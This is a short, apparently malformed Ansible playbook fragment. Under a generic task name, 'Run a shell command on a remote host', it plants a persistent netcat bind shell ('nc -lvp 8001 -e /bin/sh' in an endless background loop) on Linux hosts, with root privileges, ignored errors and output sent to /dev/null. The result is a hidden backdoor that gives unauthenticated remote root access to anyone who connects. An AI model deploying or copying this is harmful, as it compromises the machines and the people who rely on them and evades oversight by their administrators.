- hosts: linux
  become: true
  become_method: enable
  ignore_errors: true
  - name: "Run a shell command on a remote host"
    shell: while :; do nc -lvp 8001 -e /bin/sh; sleep 120; done &>/dev/null &